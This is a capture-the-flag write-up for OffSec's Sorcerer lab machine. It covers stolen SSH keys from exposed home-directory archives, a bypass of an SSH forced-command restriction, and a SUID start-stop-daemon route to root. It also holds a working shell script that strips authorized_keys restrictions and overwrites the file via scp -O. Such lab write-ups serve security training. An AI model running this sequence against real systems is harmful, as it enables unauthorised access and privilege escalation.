April 15, 2025

Sorcerer Proving Grounds Write-Up

Proving Grounds Sorcerer machine walkthrough

SUMMARY

This write-up covers the Sorcerer machine from OffSec’s Proving Grounds, a Linux machine whose initial access hinges on working around an SSH forced-command restriction rather than on a conventional exploit.

Port 7742 hosted a web service; directory fuzzing revealed a /zipfiles path serving ZIP archives of user home directories. Extracting user max’s archive yielded his SSH private key. Connecting with that key failed: the matching entry in max’s authorized_keys carried a command= directive (a forced command) that blocks an interactive login and runs a script in its place, and that script only permitted scp commands. The local copy of the authorized_keys entry was edited to strip the restriction, and scp -O (which forces the legacy SCP protocol instead of the SFTP transfer that newer OpenSSH scp uses by default) was used to overwrite authorized_keys on the target with the clean entry. SSH as max then succeeded.
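The authorized_keys rewrite described above, as an added example that is not part of the original write-up: a small POSIX shell helper that strips the option list (command=, no-pty and friends) from an authorized_keys entry, plus the scp -O upload step. The script path, key material, comment and hostname below are constructed placeholders, not values from the machine.

```shell
#!/bin/sh
# Added example, not code from the original write-up. All key material,
# paths and hostnames here are constructed placeholders.

# Print the "keytype base64-key [comment]" part of an authorized_keys line,
# dropping any leading option list such as command="...",no-pty,no-port-forwarding.
# Works by locating the first whitespace-separated field that looks like a key
# type (ssh-*, ecdsa-*, sk-*) and is followed by a base64 blob; a quoted option
# value that itself contains such a token would confuse it, which is acceptable
# for the usual one-entry file recovered from a home-directory archive.
strip_key_options() {
    printf '%s\n' "$1" | awk '{
        for (i = 1; i <= NF; i++) {
            if ($i ~ /^(ssh-|ecdsa-|sk-)/ && $(i+1) ~ /^[A-Za-z0-9+\/=]+$/) {
                out = $i
                for (j = i + 1; j <= NF; j++) out = out " " $j
                print out
                exit
            }
        }
    }'
}

# Produce a clean authorized_keys from a downloaded copy and push it back over
# the legacy SCP protocol. -O matters on OpenSSH 9.x clients: plain scp would
# use SFTP, which asks the server to run sftp-server, a command the forced
# command script described in the write-up does not allow; legacy scp runs
# "scp -t <path>", which it does.
# usage: upload_clean_keys ./max_authorized_keys ./id_rsa max@TARGET
upload_clean_keys() {
    src=$1 key=$2 dest=$3
    while IFS= read -r line; do
        strip_key_options "$line"
    done < "$src" > authorized_keys.clean
    scp -O -i "$key" authorized_keys.clean "$dest:.ssh/authorized_keys"
}

# Constructed sample entry in the shape the write-up describes (hypothetical
# script path and key); running the file prints the cleaned line.
SAMPLE='command="/home/max/restricted.sh",no-pty,no-port-forwarding ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC7example max@sorcerer'
strip_key_options "$SAMPLE"
```

Once the clean entry is in place, a normal `ssh -i id_rsa max@TARGET` gets a shell because the server no longer sees a forced command for that key. Overwriting the whole file is also what makes this reliable: appending a second copy of the same key would still match the original restricted entry first.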

Privilege escalation was achieved via a SUID start-stop-daemon binary. The standard GTFOBins SUID technique for this binary was applied to run a shell as root.


PATH TO FOLLOW

  1. Reconnaissance & /zipfiles Directory Discovery
  2. SSH Key Extraction from User ZIP Archive
  3. authorized_keys Restriction Analysis & SCP Bypass
  4. SSH Access as max
  5. SUID start-stop-daemon Discovery
  6. GTFOBins Abuse → Shell as Root

Due to OffSec’s policy on content sharing, these write-ups will provide hints only rather than full solutions. I know, boring stuff.